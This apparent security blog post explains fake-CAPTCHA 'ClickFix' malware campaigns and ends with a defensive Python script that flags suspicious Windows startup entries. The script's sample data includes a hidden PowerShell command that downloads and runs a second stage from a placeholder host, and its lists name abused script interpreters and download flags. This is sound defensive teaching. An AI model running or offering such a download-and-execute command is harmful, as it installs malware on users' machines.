Hey — have you heard that hackers have a trick now to hide malware behind a fake “I am not a robot” CAPTCHA page? This Russian group (usually called Star Blizzard or ColdRiver depending on which cybersecurity provider you read) is pushing families of malware called NoRobot, MaybeRobot, and YesRobot. Basically, the attacker presents a fake CAPTCHA on a website, you click it, and the malware runs.
A Quick Story (Yes, This is a Real One)
A friend of mine once told me that they clicked on a CAPTCHA on a website that seemed normal. Shortly after clicking the CAPTCHA, their laptop slowed dramatically and a weird program began trying to send files out. We cleaned up the machine, changed the passwords, and learned the hard way that it probably is good practice to avoid suspicious CAPTCHAs altogether. It wasn’t worth the time or stress for a small mouse click.
How This Attack is Done (Simple Steps)
Hackers use a technique known as ClickFix. They will take you to a fake CAPTCHA page that appears to be a legitimate human check. Once you click it, it drops a very small installer. This installer can:
• Run automatically on startup,
• Download additional malware, and
• Allow the hackers to take remote control of your computer or steal your data.
The group continues to alter the code and split files to evade detection. They combine NoRobot, MaybeRobot, and YesRobot so that security tools are unable to recognize a pattern.
Two Real-Life Examples You Are Likely to Encounter
Example 1 - Fake download site: You are browsing a free fonts site and click to get a font. Upon clicking, the page shows a CAPTCHA. When you complete the CAPTCHA, a screen pops up with a downloaded file labeled “font-installer.exe.” It appears to be normal, but when you run the file, it runs a payload behind the scenes to steal any passwords saved in your browser.
Example 2 - Job board scam: You have applied for a job on a job board and a site says “prove you’re human.” The click handler has been built into the CAPTCHA, and when you click it, a small script runs that silently reads your Documents folder and sends the file names back to the attacker.
Basic Steps to Protect Yourself
- Don't perform CAPTCHAs on unfamiliar or sketchy sites. If you see something that seems off, leave.
- Stay up to date and run a reputable antivirus that checks your downloads and scripts.
- If you suspect an infection, use good backups and change your passwords. Also consider doing a full scan and a restore.
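If you do suspect an infection, one concrete check is to review what is set to run at startup, since the installer described above persists that way and often launches from a user-writable folder or through a script interpreter that pulls down more malware. The helper below is an added example written for this post, not code from the original article or from any security vendor; the autorun entries it inspects are constructed sample data, and the lists of trusted paths, interpreters and argument fragments are illustrative heuristics, not an exhaustive rule set.

```python
"""
Added example (not from the original post): a small triage helper for
reviewing startup ("autorun") entries after a suspected fake-CAPTCHA click.
The entry format and every sample entry below are constructed for
illustration; real entries would come from the Windows Run registry keys,
the Startup folder or Scheduled Tasks.
"""
from dataclasses import dataclass

# Where a properly installed program normally lives. An autorun entry that
# launches from anywhere else (Downloads, Temp, AppData) deserves a closer
# look, because a "small installer" dropped by a click usually lands there.
TRUSTED_PREFIXES = (
    r"c:\program files",
    r"c:\program files (x86)",
    r"c:\windows\system32",
)

# Script interpreters commonly abused to fetch and run a second stage.
LOLBIN_INTERPRETERS = ("powershell", "pwsh", "mshta", "wscript", "cscript", "cmd")

# Argument fragments that hint at a download or hidden execution.
SUSPICIOUS_ARGS = (
    "downloadstring", "invoke-webrequest", "iwr ", "curl ", "http://", "https://",
    "-windowstyle hidden", "-w hidden", "-encodedcommand", "-enc ", "bypass",
)


@dataclass
class AutorunEntry:
    source: str    # constructed label, e.g. "HKCU Run" or "Startup folder"
    name: str
    command: str


def first_token(command: str) -> str:
    """Return the program being launched, handling a quoted path."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split(" ", 1)[0]


def score_entry(entry: AutorunEntry) -> list[str]:
    """Return the reasons an entry looks suspicious (empty list = nothing found)."""
    reasons = []
    cmd_lower = entry.command.lower()
    exe = first_token(entry.command).lower()
    exe_name = exe.rsplit("\\", 1)[-1]

    if not any(exe.startswith(p) for p in TRUSTED_PREFIXES):
        reasons.append(f"launches from non-standard location: {exe}")
    if any(exe_name.startswith(i) for i in LOLBIN_INTERPRETERS):
        reasons.append(f"uses script interpreter {exe_name}")
    for frag in SUSPICIOUS_ARGS:
        if frag in cmd_lower:
            reasons.append(f"argument looks like download/hidden execution: {frag.strip()}")
    return reasons


def triage(entries: list[AutorunEntry]) -> dict[str, list[str]]:
    """Map each flagged entry name to its reasons; clean entries are omitted."""
    flagged = {}
    for entry in entries:
        reasons = score_entry(entry)
        if reasons:
            flagged[entry.name] = reasons
    return flagged


# Constructed sample data: one normal entry, one dropped installer named
# after the font example in the post, one interpreter-based downloader.
SAMPLE_ENTRIES = [
    AutorunEntry("HKCU Run", "OneDrive",
                 r'"C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background'),
    AutorunEntry("HKCU Run", "FontInstaller",
                 r"C:\Users\alice\Downloads\font-installer.exe"),
    AutorunEntry("Startup folder", "Updater",
                 r'powershell.exe -WindowStyle Hidden -Command "iwr http://example.invalid/stage2 '
                 r'-OutFile $env:TEMP\s.exe; & $env:TEMP\s.exe"'),
]

if __name__ == "__main__":
    for name, reasons in triage(SAMPLE_ENTRIES).items():
        print(f"[!] {name}")
        for reason in reasons:
            print(f"    - {reason}")
```

Run as-is it prints the two flagged sample entries with their reasons; the OneDrive entry, launched from Program Files with an ordinary argument, produces no output. On a real machine you would feed it the names and commands exported from the Run keys and Startup folder, then treat anything flagged as a candidate for removal before restoring from backup and changing passwords.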
Final Thoughts
We all want to think we are safe. Although we know there are hackers on the internet, we trust sites like Google to offer valid CAPTCHAs. While these CAPTCHAs appear clever and seem to prove we are human, the harm we can cause as humans is small. Small steps, from not completing suspicious CAPTCHAs to keeping good backups, will stop 99% of this, as prevention is better than cure.